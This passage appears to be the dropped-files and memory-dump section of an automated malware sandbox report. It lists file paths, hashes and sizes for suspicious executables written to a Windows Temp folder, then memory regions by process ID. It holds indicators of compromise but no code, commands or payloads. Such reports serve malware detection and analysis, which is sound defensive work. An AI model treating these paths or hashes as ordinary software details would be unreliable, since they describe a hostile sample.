    a5dedf79bc2f22aa701d7d9765a8a97f

    SHA1

    c62800773f435d4c026e1b933b826fb6d6ff1ee7

    SHA256

    61f4a259fc70b959c2c863a25892810e512a9b153b1a354f8ab6d6063870fcb7

    SHA512

    7301151f078a2b524d5bd4ecc40022cba4fe2e3100a346618a682d4b02dbcf1da722aa7b1600454cdc713e096db90022290d9fdf8cc6f324d36620932763a16b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    72da42daf928e2204610000948093e50

    SHA1

    0cfe36c4c26d2d3f48bbd5455ad538224d03f344

    SHA256

    1e864444f1fb06744db03308d2dea40f6c70b4bef726437bb97233fdc41fb3a0

    SHA512

    38974dd26d754314807f8ded29df62108af5ee0882608d56f8bf782b5d16898c9b4780a81696260bc33d57630e12bc8f30ae95b7b985bffda0fe5c0537c9930c

  • \Users\Admin\AppData\Local\TempGK41BESHU8OLGVCED7YZKHTKUZNGBV20.EXE

    Filesize

    2.0MB

    MD5

    5b0a7fc38aabac34a16d0b7739a5920f

    SHA1

    247eca5db3c002ff17728a0ec84b8df3931b0924

    SHA256

    31fa3a682cac17998ecd8a575f58916e5d6fa26d5eec61f71af4898f5849717e

    SHA512

    0bb20421a6fe1a1ed30f1d0cd3275ca1ad229d77fe76a0e14c03a986c05a592364ef9ea5660f01e2b136ba90874985f5c9731ad6218648e56d4aba32c70e5abe

  • \Users\Admin\AppData\Local\Temp\764661\Macromedia.com

    Filesize

    925KB

    MD5

    62d09f076e6e0240548c2f837536a46a

    SHA1

    26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

    SHA256

    1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

    SHA512

    32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

  • memory/1188-76-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-67-0x0000000006C10000-0x00000000070C7000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-638-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-107-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-32-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-34-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-48-0x0000000006C10000-0x00000000070C7000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-69-0x0000000006C10000-0x0000000007285000-memory.dmp

    Filesize

    6.5MB

  • memory/1188-84-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-70-0x0000000006C10000-0x0000000007285000-memory.dmp

    Filesize

    6.5MB

  • memory/1188-72-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-75-0x0000000006C10000-0x0000000007285000-memory.dmp

    Filesize

    6.5MB

  • memory/1188-82-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-154-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-78-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1188-80-0x00000000011B0000-0x0000000001669000-memory.dmp

    Filesize

    4.7MB

  • memory/1592-619-0x0000000000E20000-0x0000000000EEE000-memory.dmp

    Filesize

    824KB

  • memory/1640-68-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-109-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-133-0x0000000006810000-0x0000000006E85000-memory.dmp

    Filesize

    6.5MB

  • memory/1640-105-0x0000000006810000-0x0000000006E85000-memory.dmp

    Filesize

    6.5MB

  • memory/1640-132-0x0000000006810000-0x0000000006E85000-memory.dmp

    Filesize

    6.5MB

  • memory/1640-73-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-601-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-83-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-79-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-85-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-77-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-49-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-103-0x0000000006810000-0x0000000006E85000-memory.dmp

    Filesize

    6.5MB

  • memory/1640-81-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1640-537-0x0000000000140000-0x00000000005F7000-memory.dmp

    Filesize

    4.7MB

  • memory/1728-612-0x00000000001A0000-0x0000000000659000-memory.dmp

    Filesize

    4.7MB

  • memory/1852-590-0x00000000064E0000-0x0000000006999000-memory.dmp

    Filesize

    4.7MB

  • memory/1852-589-0x00000000064E0000-0x0000000006999000-memory.dmp

    Filesize

    4.7MB

  • memory/2332-630-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-628-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-632-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

    Filesize

    4KB

  • memory/2332-626-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-633-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-622-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-635-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2332-624-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/2488-591-0x0000000000EA0000-0x0000000001359000-memory.dmp

    Filesize

    4.7MB

  • memory/2488-603-0x0000000000EA0000-0x0000000001359000-memory.dmp

    Filesize

    4.7MB

  • memory/2500-108-0x0000000000850000-0x0000000000EC5000-memory.dmp

    Filesize

    6.5MB

  • memory/2500-106-0x0000000000850000-0x0000000000EC5000-memory.dmp

    Filesize

    6.5MB

  • memory/2620-71-0x0000000000320000-0x0000000000995000-memory.dmp

    Filesize

    6.5MB

  • memory/2620-74-0x0000000000320000-0x0000000000995000-memory.dmp

    Filesize

    6.5MB

  • memory/2668-12-0x00000000063A0000-0x0000000006859000-memory.dmp

    Filesize

    4.7MB

  • memory/2668-13-0x00000000063A0000-0x0000000006859000-memory.dmp

    Filesize

    4.7MB

  • memory/2832-650-0x0000000000400000-0x00000000008A3000-memory.dmp

    Filesize

    4.6MB

  • memory/3000-27-0x00000000070C0000-0x0000000007579000-memory.dmp

    Filesize

    4.7MB

  • memory/3000-31-0x00000000001A0000-0x0000000000659000-memory.dmp

    Filesize

    4.7MB

  • memory/3000-28-0x00000000070C0000-0x0000000007579000-memory.dmp

    Filesize

    4.7MB